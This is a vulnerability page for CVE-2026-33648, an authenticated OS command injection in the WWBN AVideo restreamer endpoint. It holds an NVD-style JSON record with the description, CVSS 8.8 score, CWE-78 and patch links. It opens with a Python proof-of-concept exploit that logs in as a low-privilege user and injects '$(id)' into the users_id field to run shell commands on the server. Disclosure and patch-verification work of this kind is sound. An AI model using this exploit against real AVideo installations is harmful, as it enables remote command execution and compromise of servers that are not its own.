CVE-2026-33648

import requests import json # Target URL (example) target_url = "http://localhost/AVideo/plugin/REST/RESTServer.php" # Login credentials (Low privilege user required) login_payload = { "user": "attacker", "pass": "password" } # 1. Authenticate to get a session/cookie session = requests.Session() login_resp = session.post(target_url, data=login_payload) if "success" in login_resp.text: print("[+] Login successful") # 2. Prepare the malicious payload # The vulnerability is in 'users_id' and 'liveTransmitionHistory_id'. # We inject shell metacharacters to execute 'id' command. # Payload: $(id) or `id` injection_payload = "$(id)" exploit_data = { "users_id": injection_payload, "liveTransmitionHistory_id": "1", "action": "restreamer" # Assuming this triggers the vulnerable endpoint logic } headers = { "Content-Type": "application/json" } # 3. Send the exploit request print(f"[*] Sending payload with users_id: {injection_payload}") exploit_resp = session.post(target_url, json=exploit_data, headers=headers) # 4. Check response or server state for command execution result print("[*] Response received:") print(exploit_resp.text) else: print("[-] Login failed")

{"cve": {"id": "CVE-2026-33648", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:40.907", "lastModified": "2026-03-25T17:55:16.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks. Commit 99b865413172045fef6a98b5e9bfc7b24da11678 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el endpoint del restreamer construye una ruta de archivo de registro incrustando valores controlados por el usuario `users_id` y `liveTransmitionHistory_id` del cuerpo de la solicitud JSON sin ninguna sanitización. Esta ruta de archivo de registro se concatena luego directamente en comandos de shell pasados a `exec()`, permitiendo a un usuario autenticado lograr la ejecución arbitraria de comandos en el servidor a través de metacaracteres de shell como `$()` o comillas invertidas. El commit 99b865413172045fef6a98b5e9bfc7b24da11678 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}